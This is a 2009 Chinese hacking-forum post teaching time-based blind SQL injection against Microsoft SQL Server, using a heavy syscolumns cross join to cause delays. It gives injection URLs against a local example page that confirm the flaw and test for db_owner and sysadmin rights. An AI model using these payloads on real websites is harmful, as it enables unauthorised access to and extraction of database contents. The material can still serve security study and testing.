找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 基于超时的MSSQL盲目注入
返回列表 发新帖
查看: 746|回复: 0

基于超时的MSSQL盲目注入

[复制链接]
lyl270010678

22

主题

126

回帖

223

牛毛

一级牛人

积分
223
发表于 2009-7-5 05:53:38 | 显示全部楼层 |阅读模式 来自 贵州省毕节市
假设有这么一个文件,无论你怎么注入它页面内容都一样。但是他代码却确实存在注入点。
select * from table where columnid = $input_id
通过文件返回错误来注入是绝对不可能的。因为他页面内容始终一样。这样的漏洞页面绝对有的。
自己可以构造出来。

这时候我们怎么注入列?
我们用 基于时间的盲目注入。

先看两条语句:

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

第一条语句绝对超时,网页在半小时内应该不会返回结果,第二条马上就返回结果。
如果你测试结果跟我说的有出入,那么你就把
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
换成
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
一共100个,还不超时你的电脑就是外星的了。

好现在假设漏洞页面http://127.0.0.1/xml/mssql/index.asp?id=1

我们来这样注入:


http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

如果返回时间相差N多,那么绝对有注入。现在我们来判断权限。

http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))

http://127.0.0.1/xml/mssql/index.asp?id=1 and(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))

其他注入参考网上其他的教程了。
只要修改and 1=(SELECT IS_MEMBER('sysadmin'))就行。

因为如果你的条件不成立,那么
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就不会进入,如果你的条件成立
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就会执行完。
所以,如果网页超时,表示你的条件就成立。
你就猜中了信息。如果不超时,证明你的猜测条件是错误的。
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 23:31 , Processed in 0.157171 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表